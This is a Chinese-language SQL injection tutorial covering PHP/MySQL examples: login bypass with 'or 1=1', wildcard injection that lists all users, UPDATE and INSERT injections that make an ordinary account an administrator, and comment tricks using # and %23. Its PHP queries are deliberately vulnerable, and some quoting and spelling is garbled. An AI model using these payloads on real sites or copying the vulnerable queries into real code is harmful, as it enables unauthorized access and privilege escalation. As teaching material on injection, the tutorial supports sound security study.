SQL注入实例

  1.select语句

  通常我们在用户登陆的时候,SQL语句如此写法:

  $sql=select * from users where userName='{$_POST['unm']} '


  •   主要是用来检查这个用户是否存在,

  •   如果说我在用户名一栏填上: 1=1 or 1='1'

      那么sql语句就变成了:

      select * from users where userName=1=1 or 1='1';

      你填上去试试看?可以轻松绕过验证,同样密码在输入的时候也可以如此做法

  •   还可以如此填法:%1,或者*1,,只要以通配符开头都可以绕过验证

  •   2.通配符

  •   <form method=“POST” action=“<  echo $PHP_SELF;  >“>

      <input type=“text” name=“search”$amp;>amp;$lt;br>

      <input type=“submit” value=“Search”>

      </form>

      < php

      ………

      SELECT * FROM users WHERE username LIKE ‘%$search%’ ORDER BY username

      …….

      >

  •   ’%’ 就是通配符,其它的通配符还有’*’和’_’,其中" * "用来匹配字段名,而" % "用来匹配字段值,注意的是%必须与like一起适用,还有一个通配符,就是下划线" _ ",它代表的意思和上面不同,是用来匹配任何单个的字符的。在上面的代码中我们用到了’*’表示返回的所有字段名,%$search%表示所有包 含$search字符的内容。

  •   在表单里提交

      Aabb%’ or 1=1 order by id#

      注:#在mysql中表示注释的意思,即让后面的sql语句不执行,后面将讲到。

      或许有人会问为什么要用or 1=1呢,看下面,

      把提交的内容带入到sql语句中成为

  •   SELECT * FROM users WHERE username LIKE ‘%aabb%’ or 1=1 order by id# ORDER BY username

  •   假如没有含有aabb的用户名,那么or 1=1使返回值仍为真,使能返回所有值

      我们还可以这样

      在表单里提交

      %’ order by id#

      或者

      ’ order by id#

      带入sql语句中成了

      SELECT * FROM users WHERE username LIKE ‘% %’ order by id# ORDER BY username

      和

      SELECT * FROM users WHERE username LIKE ‘%%’ order by id# ORDER BY username

      当然了,内容全部返回。

      列出所有用户了哟,没准连密码都出来哩。

      3.update

      我们先给出表的结构,这样大家看的明白

      CREATE TABLE users (

      id int(10) NOT NULL auto_increment,

      login varchar(25),

      password varchar(25),

      email varchar(30),

      userlevel tinyint,

      PRIMARY KEY (id)

      )

      其中userlevel表示等级,1为管理员,2为普通用户

      < php

      //change.php

      ……

      $sql = "UPDATE users SET password='$pass', email='$email' WHERE id='$id'"

      ……

      >

      Ok,我们开始注入了哦,在添email的地方我们添入

      ’,userlevel=’1

      sql语句执行的就是

      UPDATE users SET password='youpass',

      [email]email='’,userlevel=’1’[/email] WHERE id='youid’

      看看我们的userlevel就是1了,变成管理员了哟

      哈哈,如此之爽,简直是居家旅行必备啊。

      这里我们简单提一下单引号闭合的问题,如果只用了一个单引号而没有单引号与之组成一对,系统会返回错误。列类型主要分为数字类型,日期和时间类 型,字符串类型,然而引号一般用在字符串类型里,而在数字类型里一般人都不会用到引号(然而却是可以用的,而且威力很大),日期和时间类型就很少用于注入 了(因为很少有提交时间变量的)

  •   4.insert

  •   看看表的结构先

      CREATE TABLE membres (

      id varchar(15) NOT NULL default '',

      login varchar(25),

      password varchar(25),

      email varchar(30),

      userlevel tinyint,

      PRIMARY KEY (id)

      )

      我们仍然假设userlevel表示用户等级,1为管理者,2为普通用户哈。

      代码如下

      < php

      //reg.php

      ……

      $query = "INSERT INTO members VALUES('$id','$login','$pass','$email',’2')" ;

      ……

      >

      默认插入用户等级是2

      现在我们构建注入语句了哦

      还是在要我们输入email的地方输入:

      ’,’1’)#

      sql语句执行时变成了:

      INSERT INTO membres VALUES ('youid','youname','youpass',' ’,’1’)#', ')

      看我们一注册就是管理员了。

      #号表示什么来着,不是忘了吧,晕了,这么快?

      忘就忘了吧,下面再详细给你说说

      5.mysql中的注释

      这个是很重要的,大家可不能再睡觉啦,要是再睡觉到期末考试的时候就挂了你们。

      我们继续

      相信大家在上面的几个例子中已经看到注释的强大作用了吧,这里我们将再详细介绍一下。

      Mysql有3种注释句法

      # 注射掉注释符后面的本行内容

      -- 注射效果同#

      /* ... */  注释掉符号中间的部分

      对于#号将是我们最常用的注释方法。

      -- 号记得后面还得有一个空格才能起注释作用。

      /*…*/  我们一般只用前面的/*就够了,因为后面的我们想加也不行,是吧?

      注意:在浏览器地址栏输入#时应把它写成%23,这样经urlencode转换后才能成为#,从而起到注释的作用。#号在浏览器的地址框中输入的话可什么也不是哦。

      为了大家深刻理解

      这里我给大家来个例题

      有如下的管理员信息表

  •   CREATE TABLE alphaauthor (

      Id tinyint(4) NOT NULL auto_increment,

      UserName varchar(50) NOT NULL default '',

      PASSWORD varchar(50) default NULL,

      Name varchar(50) default NULL,

      PRIMARY KEY  (Id),

      UNIQUE KEY Id (Id),

      KEY Id_2 (Id)

      )

  •   < php

      //Login.php

      ……

      $query="select * from alphaauthor where UserName='$username' and Password='$passwd'";

      $result=mysql_query($query);

      $data=mysql_fetch_array($result);

      if ($data)

      {

      Echo “重要信息”;

      }

      Else

      Echo “登陆失败”;

      ……

      >

  •   我们在浏览器地址框直接输入

      username=a’or id=1 %23

      %23转换成#了

      放到sql语句中

      select * from alphaauthor where UserName='a’or id=1 #' and Password='$passwd'

      #号后面的都拜输入了,看看

      这句话等价于

      select * from alphaauthor where UserName='a’or id=1

  •   再仔细看看表的结构,只要有id=1的账户,返回的$data就应该为真

      我们就直接登陆了,当然你也可以写

      hppt://***/login.php username=a’or 1=1 %23

      一样的啦